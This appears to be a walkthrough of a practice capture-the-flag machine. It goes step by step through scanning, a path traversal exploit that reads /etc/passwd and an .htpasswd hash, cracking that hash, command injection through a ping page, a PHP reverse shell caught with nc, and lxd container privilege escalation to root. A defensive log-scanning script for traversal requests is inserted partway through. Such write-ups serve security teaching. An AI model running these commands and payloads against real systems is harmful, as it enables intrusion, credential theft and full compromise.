Vulnhub Al-Web-2.0 Walkthrough

Scanning the box with nmap -A -T4 -p- 192.168.1.6 -vv

Scan with dirb http://192.168.1.6 /usr/share/dirb/wordlists/big.txt

Also with -X .php

Then go to /signup.php, pick a name, and log in with it:

According to searchsploit, XuezhuLi FileSharing has two exploits; the one we need is 40009.txt.

Once we view it and read it, it's easy to put to work, with the help of Burp Suite of course.

Open Burp Suite and capture the page 192.168.1.6/userpage.php, then send it to Repeater and add this part to the header:

GET /viewing.php?file_name=../../../../../../../../../../../../../etc/passwd HTTP/1.1

So now on the right we have the passwd file with the user names, and we find two: n0nr00tuser and aiweb2.
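A detection-side view of the traversal request above, as an added example that is not part of the original walkthrough: it scans access-log lines for file_name values that contain ".." path segments, including percent-encoded and double-encoded forms. The log lines are constructed samples, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not captured from the target box).
SAMPLE_LOG = """\
192.168.1.5 - - [01/Jan/2020:10:00:01 +0000] "GET /viewing.php?file_name=report.pdf HTTP/1.1" 200 5120
192.168.1.5 - - [01/Jan/2020:10:00:09 +0000] "GET /viewing.php?file_name=../../../../etc/passwd HTTP/1.1" 200 1843
192.168.1.5 - - [01/Jan/2020:10:00:15 +0000] "GET /viewing.php?file_name=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843
192.168.1.5 - - [01/Jan/2020:10:00:21 +0000] "GET /viewing.php?file_name=%252e%252e%252fetc%252fshadow HTTP/1.1" 404 0
192.168.1.7 - - [01/Jan/2020:10:01:02 +0000] "GET /viewing.php?file_name=notes..txt HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input (%252e) is unmasked."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the decoded value has a '..' path segment or is an absolute path."""
    path = fully_decode(value).replace("\\", "/")
    return path.startswith("/") or ".." in path.split("/")

def find_traversal(log_text, param="file_name"):
    """Return (client, status, decoded value) for each request whose param traverses."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, _ts, _method, target, status = m.groups()
        # parse_qs decodes once; fully_decode strips any remaining encoding layers
        for raw in parse_qs(urlsplit(target).query).get(param, []):
            if is_traversal(raw):
                hits.append((client, int(status), fully_decode(raw)))
    return hits

if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means the file was actually served, which is the case to triage first.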

Let’s download the .htpasswd file from apache2:

aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/

Use john to crack the hash:

john --wordlist=rockyou-45.txt /root/hash.txt

So the password behind the hash is c.ronaldo. Now we log in at http://192.168.1.6/webadmin as aiweb2admin with the password c.ronaldo.

OK, so we browse to /robots.txt.

We get two directories: /H05Tpin9555/ and /S0mextras/

The page H05Tpin9555 is a ping page where you can ping any IP. I tried using && and ; but they didn't work, so I googled it, and according to this site https://techsphinx.com/hacking/hacking-for-beginners-command-injection-vulnerability/ you can use || with id and ls along with the ping command:

Now we can upload a shell script and get a connection to our machine:

Just a small note: the file php-reverse-shell.php had to be renamed to shell.php, otherwise it won't work. Anyway, it's uploaded, and now we call it from http://192.168.1.6/H05Tpin9555/shell.php while we have nc -lvp 4444 on our machine ready to receive it.

There is still the other directory, /S0mextras, that we haven't looked inside, so let's visit it:

User: n0nr00tuser Cred: zxowieoi4sdsadpEClDws1sf. Let's log in with it over ssh:

The user is part of the lxd group, and the host is running Ubuntu 18.04, which is vulnerable to lxd (searchsploit lxd), so we are going to download lxd-alpine-builder from https://github.com/saghul/lxd-alpine-builder.git and follow these steps.

On our machine inside the lxd folder we run:

sudo ./build-alpine

sudo ./build-alpine -h

Then on the host machine we run this:

lxc image import alpine-v3.3-x86_64-20160114_2308.tar.gz --alias myimage

lxc image list

lxc init myimage hacker -c security.privileged=true

lxc config device add hacker mydevice disk source=/ path=/mnt/root recursive=true

lxc start hacker

lxc exec hacker /bin/sh

Now we are root. Head to /mnt/root/root/ and catch the flag.
